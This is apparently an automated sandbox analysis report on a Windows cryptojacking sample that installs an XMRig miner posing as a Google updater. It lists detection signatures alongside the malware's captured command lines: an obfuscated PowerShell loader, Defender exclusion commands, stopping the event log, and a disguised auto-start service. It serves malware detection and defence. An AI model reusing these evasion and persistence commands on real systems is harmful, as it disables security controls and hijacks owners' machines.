      00000042.00000002.3442004748.0000000140001000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000042.00000002.3442004748.0000000140001000.00000040.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x36fc08:$a1: mining.set_target
        • 0x361e30:$a2: XMRIG_HOSTNAME
        • 0x3647a8:$a3: Usage: xmrig [OPTIONS]
        • 0x361e08:$a4: XMRIG_VERSION

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        66.2.dialer.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          66.2.dialer.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
          • 0x370008:$a1: mining.set_target
          • 0x362230:$a2: XMRIG_HOSTNAME
          • 0x364ba8:$a3: Usage: xmrig [OPTIONS]
          • 0x362208:$a4: XMRIG_VERSION
          66.2.dialer.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
          • 0x3b5761:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
          66.2.dialer.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
          • 0x3b5fd8:$s1: %s/%s (Windows NT %lu.%lu
          • 0x3b9600:$s3: \\.\WinRing0_
          • 0x3671a8:$s4: pool_wallet
          • 0x3615d8:$s5: cryptonight
          • 0x3615e8:$s5: cryptonight
          • 0x3615f8:$s5: cryptonight
          • 0x361608:$s5: cryptonight
          • 0x361620:$s5: cryptonight
          • 0x361630:$s5: cryptonight
          • 0x361640:$s5: cryptonight
          • 0x361658:$s5: cryptonight
          • 0x361668:$s5: cryptonight
          • 0x361680:$s5: cryptonight
          • 0x361698:$s5: cryptonight
          • 0x3616a8:$s5: cryptonight
          • 0x3616b8:$s5: cryptonight
          • 0x3616c8:$s5: cryptonight
          • 0x3616e0:$s5: cryptonight
          • 0x3616f8:$s5: cryptonight
          • 0x361708:$s5: cryptonight
          • 0x361718:$s5: cryptonight

          Sigma Signatures

          Change of critical system settings

          barindex
          Sigma detected: Disable power options
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\egFMhHSlmf.exe", ParentImage: C:\Users\user\Desktop\egFMhHSlmf.exe, ParentProcessId: 1764, ParentProcessName: egFMhHSlmf.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 2676, ProcessName: powercfg.exe

          System Summary

          barindex
          Sigma detected: Potential PowerShell Command Line Obfuscation
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OkULRfyuHQtJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DHHElPDheRwtsc,[Parameter(Position=1)][Type]$RGuqRFFAmI)$xKbDjiiiAOv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'yMo'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+'D'+'el'+[Char](101)+''+[Char](103)+'a'+'t'+''+'e'+''+[Char](84)+'yp'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+'ss'+[Char](44)+'Pu'+'b'+'l'+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+'e'+'a'+'l'+''+'e'+'d,'+[Char](65)+'ns'+'i'+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+'s',[MulticastDelegate]);$xKbDjiiiAOv.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+'b'+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$DHHElPDheRwtsc).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+','+'Man'+'a'+'g'+[Char](101)+''+[Char](100)+'');$xKbDjiiiAOv.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+'i'+'g'+','+'N'+[Char](101)+'w'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$RGuqRFFAmI,$DHHElPDheRwtsc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',Ma'+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $xKbDjiiiAOv.CreateType();}$HPsmfKkDEZPEO=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+'c'+[Char](114)+''+'o'+'s'+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+'U'+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$AzPrwzsUpDJMwf=$HPsmfKkDEZPEO.GetMethod(''+[Char](71)+''
          Sigma detected: Potential WinAPI Calls Via CommandLine
          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OkULRfyuHQtJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DHHElPDheRwtsc,[Parameter(Position=1)][Type]$RGuqRFFAmI)$xKbDjiiiAOv=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+''+'c'+'t'+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'yMo'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+'D'+'el'+[Char](101)+''+[Char](103)+'a'+'t'+''+'e'+''+[Char](84)+'yp'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+'ss'+[Char](44)+'Pu'+'b'+'l'+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+'e'+'a'+'l'+''+'e'+'d,'+[Char](65)+'ns'+'i'+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+'s',[MulticastDelegate]);$xKbDjiiiAOv.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+'H'+'i'+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g'+[Char](44)+'P'+[Char](117)+'b'+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$DHHElPDheRwtsc).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+','+'Man'+'a'+'g'+[Char](101)+''+[Char](100)+'');$xKbDjiiiAOv.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+'i'+'g'+','+'N'+[Char](101)+'w'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$RGuqRFFAmI,$DHHElPDheRwtsc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',Ma'+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $xKbDjiiiAOv.CreateType();}$HPsmfKkDEZPEO=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+'c'+[Char](114)+''+'o'+'s'+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+'U'+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$AzPrwzsUpDJMwf=$HPsmfKkDEZPEO.GetMethod(''+[Char](71)+''
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\egFMhHSlmf.exe", ParentImage: C:\Users\user\Desktop\egFMhHSlmf.exe, ParentProcessId: 1764, ParentProcessName: egFMhHSlmf.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7056, ProcessName: powershell.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\egFMhHSlmf.exe", ParentImage: C:\Users\user\Desktop\egFMhHSlmf.exe, ParentProcessId: 1764, ParentProcessName: egFMhHSlmf.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7056, ProcessName: powershell.exe
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{ed3c9ad9-1a05-4753-a177-d35f4db59610}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 3820, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 928, ProcessName: svchost.exe
          Sigma detected: New Service Creation Using Sc.EXE
          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\egFMhHSlmf.exe", ParentImage: C:\Users\user\Desktop\egFMhHSlmf.exe, ParentProcessId: 1764, ParentProcessName: egFMhHSlmf.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", ProcessId: 3540, ProcessName: sc.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\egFMhHSlmf.exe", ParentImage: C:\Users\user\Desktop\egFMhHSlmf.exe, ParentProcessId: 1764, ParentProcessName: egFMhHSlmf.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7056, ProcessName: powershell.exe

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Sigma detected: Stop EventLog
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\egFMhHSlmf.exe", ParentImage: C:\Users\user\Desktop\egFMhHSlmf.exe, ParentProcessId: 1764, ParentProcessName: egFMhHSlmf.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 5704, ProcessName: sc.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-10T04:56:07.950720+020020479282Crypto Currency Mining Activity Detected192.168.2.6612141.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-10T04:56:13.700818+020020446971A Network Trojan was detected192.168.2.649760188.114.97.3443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-10T04:57:08.272795+020020510042Crypto Currency Mining Activity Detected192.168.2.665331188.114.97.3443TCP
          2024-10-10T04:58:14.573518+020020510042Crypto Currency Mining Activity Detected192.168.2.665333188.114.97.3443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for domain / URL
          Source: jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.suVirustotal: Detection: 12%Perma Link
          Source: pool.supportxmr.comVirustotal: Detection: 7%Perma Link
          Multi AV Scanner detection for dropped file
          Source: C:\ProgramData\Google\Chrome\updater.exeReversingLabs: Detection: 73%
          Source: C:\ProgramData\Google\Chrome\updater.exeVirustotal: Detection: 75%Perma Link
          Multi AV Scanner detection for submitted file
          Source: egFMhHSlmf.exeReversingLabs: Detection: 73%
          Source: egFMhHSlmf.exeVirustotal: Detection: 75%Perma Link
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Windows\System32\dialer.exeCode function: 26_2_0000000140001000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,26_2_0000000140001000
          Source: C:\Windows\System32\dialer.exeCode function: 63_2_0000000140001000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,63_2_0000000140001000

          Bitcoin Miner

          barindex
          Yara detected Xmrig cryptocurrency miner
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000042.00000002.3447887034.0000028A981B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000042.00000002.3442004748.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
          Found strings related to Crypto-Mining
          Source: dialer.exeString found in binary or memory: cryptonight/0
          Source: egFMhHSlmf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000025.00000003.2206694268.0000017ADE760000.00000004.00000001.00020000.00000000.sdmp
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
          Source: C:\Windows\System32\dialer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
